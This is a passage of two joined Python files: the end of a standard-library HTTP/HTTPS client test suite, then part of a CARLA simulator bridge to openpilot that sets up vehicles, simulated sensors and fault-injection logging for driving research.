raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with socket_helper.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with socket_helper.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with socket_helper.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with warnings_helper.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'key_file, cert_file and check_hostname are deprecated',
DeprecationWarning)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as f:
f.write("body")
with open(os_helper.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(os_helper.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
bridge_acclimt4-2.py
|
#!/usr/bin/env python3
import argparse
import carla # pylint: disable=import-error
import math
import numpy as np
import time
import threading
from cereal import log
from multiprocessing import Process, Queue
from typing import Any
import cereal.messaging as messaging
from common.params import Params
from common.numpy_fast import clip
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
import sys,os,signal
# from sys import argv
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
type=int, default=16)
parser.add_argument('--cruise_lead', type=int, default=80) #(1 + 80%)V0 = 1.8V0
parser.add_argument('--cruise_lead2', type=int, default=80) #(1 + 80%)V0 = 1.8V0 #change speed in the middle
parser.add_argument('--init_dist', type=int, default=100) #meters; initial relative distance between vehicle and vehicle2
# parser.add_argument('--faultinfo', type=str, default='')
# parser.add_argument('--scenarioNum', type=int, default=1)
# parser.add_argument('--faultNum', type=int, default=1)
args = parser.parse_args()
W, H = 1164, 874
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
vEgo = 60 #mph #set in selfdrive/controlsd
FI_Enable = True #False: run the code in fault free mode; True: add fault inejction Engine
reInitialize_bridge = False
Mode_FI_duration = 0 # 0: FI lasts 2.5s after t_f; 1: FI whenever context is True between [t_f,t_f+2.5s]
Driver_react_Enable = False
Other_vehicles_Enable = False
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl','controlsState','radarState','modelV2'])
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button= 0
self.is_engaged=False
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
frame_id = 0
def cam_callback(image):
global frame_id
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"image": img.tobytes(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
frame_id += 1
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['pandaState'])
while not exit_event.is_set():
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
# Create a radar's callback that just prints the data
# def radar_callback(weak_radar, sensor_data):
def radar_callback( sensor_data):
# # self = weak_radar()
# # if not self:
# # return
# print("==============",len(sensor_data),'==============')
# for detection in sensor_data:
# print(detection)
# # print('depth: ' + str(detection.depth)) # meters
# # print('azimuth: ' + str(detection.azimuth)) # rad
# # print('altitude: ' + str(detection.altitude)) # rad
# # print('velocity: ' + str(detection.velocity)) # m/s
ret = 0#sensor_data[0]
collision_hist = []
def collision_callback(col_event):
collision_hist.append(col_event)
# print(col_event)
laneInvasion_hist = []
def laneInvasion_callback(LaneInvasionEvent):
laneInvasion_hist.append(LaneInvasionEvent)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState','driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i+=1
def bridge(q):
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
print("test======================================================================")
print(args.town)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Particles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[args.num_selected_spawn_point] # y -= 100+
spawn_point.location.y -= 80
#=====add 1st vehicle=====
spawn_point1 = carla.Transform(spawn_point.location,spawn_point.rotation)
# spawn_point1.location.y += 20
vehicle = world.spawn_actor(vehicle_bp, spawn_point1)
#=====add second vehicle=====
spawn_point2 = carla.Transform(spawn_point.location,spawn_point.rotation)
spawn_point2.location.y += args.init_dist#20
vehicle2 = world.spawn_actor(vehicle_bp, spawn_point2)
# vehicle2.set_autopilot(True)
#==========3rd vehilce===========
if Other_vehicles_Enable:
spawn_point3 = carla.Transform(spawn_point.location,spawn_point.rotation)
spawn_point3.location.y -= 35
spawn_point3.location.x += 7
spawn_point3.rotation.yaw += 25
vehicle3 = world.spawn_actor(vehicle_bp, spawn_point3) #following vehicle
spawn_point4 = carla.Transform(spawn_point1.location,spawn_point1.rotation)
spawn_point4.location.x += 4
spawn_point4.location.y += 15
vehicle4 = world.spawn_actor(vehicle_bp, spawn_point4)
spawn_point5 = carla.Transform(spawn_point1.location,spawn_point1.rotation)
spawn_point5.location.x += 5
spawn_point5.location.y -= 15
spawn_point5.rotation.yaw += 13
vehicle5 = world.spawn_actor(vehicle_bp, spawn_point5)
spectator = world.get_spectator()
transform = vehicle.get_transform()
spectator.set_transform(carla.Transform(transform.location + carla.Location(z=150), carla.Rotation(pitch=-90)))
#======end line===============
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
print('max_steer_angle',max_steer_angle) #70 degree
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# # Get radar blueprint
# radar_bp = blueprint_library.filter('sensor.other.radar')[0]
# # Set Radar attributes, by default are:
# radar_bp.set_attribute('horizontal_fov', '30') # degrees
# radar_bp.set_attribute('vertical_fov', '30') # degrees
# # radar_bp.set_attribute('points_per_second', '1500')
# radar_bp.set_attribute('range', '100') # meters
# # Spawn the radar
# radar = world.spawn_actor(radar_bp, transform, attach_to=vehicle, attachment_type=carla.AttachmentType.Rigid)
# # weak_radar = weakref.ref(radar)
# # radar.listen(lambda sensor_data: radar_callback(weak_radar, sensor_data))
# radar.listen(lambda sensor_data: radar_callback(sensor_data))
# # radar.listen(radar_callback)
#collision sensor detector
colsensor_bp = blueprint_library.find("sensor.other.collision")
colsensor = world.spawn_actor(colsensor_bp, transform, attach_to=vehicle)
colsensor.listen(lambda colevent: collision_callback(colevent))
#lane invasion
laneInvasion_bp = blueprint_library.find("sensor.other.lane_invasion")
laneInvasion = world.spawn_actor(laneInvasion_bp, transform, attach_to=vehicle)
laneInvasion.listen(lambda LaneInvasionEvent: laneInvasion_callback(LaneInvasionEvent))
# launch fake car threads
threads = []
exit_event = threading.Event()
threads.append(threading.Thread(target=panda_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=fake_driver_monitoring, args=(exit_event,)))
threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, exit_event,)))
for t in threads:
t.start()
time.sleep(1)
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05) #rate =100, T=1/100s=10ms
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 #keyboard signal is always 1
brake_manual_multiplier = 0.7 #keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO #keyboard signal is always 1
tm = client.get_trafficmanager(8008)
# vehicle2.set_autopilot(True,8008)
tm.vehicle_percentage_speed_difference(vehicle2,-args.cruise_lead) #Sets the difference the vehicle's intended speed and its current speed limit.
# tm.distance_to_leading_vehicle(vehicle2,5)
if Other_vehicles_Enable:
tm.vehicle_percentage_speed_difference(vehicle3,-200)
is_autopilot_engaged =False #vehicle2
fp_res = open('results/data_ADS1_{}mph_{}m_{}V0_{}V0.csv'.format(vEgo,args.init_dist,args.cruise_lead,args.cruise_lead2),'w')
fp_res.write("frameIdx,distance(m),speed(m/s),acceleration(m/s2),angle_steer,gas,brake,steer_torque,actuators_steeringAngleDeg,actuators_steer,actuators_accel,d_rel(m),v_rel(m/s),c_path(m),faultinjection,faultType,alert,hazard,hazardType,alertMsg,hazardMsg,laneInvasion,yPos,Laneline1,Laneline2,Laneline3,Laneline4,leftPath,rightPath,leftEdge,rightEdge,vel_pos.x,vel_pos.y,vel2_pos.x,vel2_pos.y,vel4_pos.x,vel4_pos.y\n")
speed = 0
throttle_out_hist = 0
FI_duration = 1000# set to be a larget value like 10 seconds so it won't be reached in the normal case with human driver engagement #250*10ms =2.5s
Num_laneInvasion = 0
t_laneInvasion = 0
pathleft = pathright = 0
roadEdgeLeft = roadEdgeRight = 0
laneLineleft=-1.85
laneLineright = 1.85
Lead_vehicle_in_vision = False #lead vehicle is captured in the camera
faulttime = -1
alerttime = -1
hazardtime = -1
fault_duration = 0
driver_alerted_time = -1
H2_count = 0
hazMsg = ""
hazard = False
hazType =0x0
alertType_list =[]
alertText1_list = []
alertText2_list = []
FI_flag = 0
FI_Type = 0
frameIdx = 0
FI_H3_combine_enable = 0
while frameIdx<5000:
altMsg = ""
alert = False
if is_openpilot_engaged:
frameIdx += 1
#simulate button Enable event
if rk.frame == 800:
q.put("cruise_up")
if frameIdx == 1000:
if args.cruise_lead != args.cruise_lead2: #change the speed of vehicle2
print("===========change Lead vehicle cruise speed from {}mph to {}mph".format(args.cruise_lead,args.cruise_lead2))
tm.vehicle_percentage_speed_difference(vehicle2,-args.cruise_lead2)
# if frameIdx >2000:
# q.put("quit")
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
actuators_steeringAngleDeg = actuators_steer = actuators_accel = 0
dRel = 0
yRel = 2.5
vRel = 0
vLead = 0
yPos = 0
ylaneLines = []
yroadEdges = []
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
print(message)
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
#in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
vehicle2.set_autopilot(True,8008)
if Other_vehicles_Enable:
vehicle3.set_autopilot(True,8008)
vehicle4.set_autopilot(True,8008)
vehicle5.set_autopilot(True,8008)
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "quit":
vehicle2.set_autopilot(False,8008)
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
#steer_out = steer_out
# steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
# print('message',old_throttle, old_steer, old_brake)
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel/4.0, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel/4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
actuators = sm['carControl'].actuators
actuators_accel = actuators.accel
actuators_steer = actuators.steer
actuators_steeringAngleDeg = actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
dRel = sm['radarState'].leadOne.dRel
yRel = sm['radarState'].leadOne.yRel #y means lateral direction
vRel = sm['radarState'].leadOne.vRel
vLead = sm['radarState'].leadOne.vLead
if not sm['radarState'].leadOne.status:
Lead_vehicle_in_vision = False
else:
Lead_vehicle_in_vision = True
md = sm['modelV2']
if len(md.position.y)>0:
yPos = round(md.position.y[0],2) # position
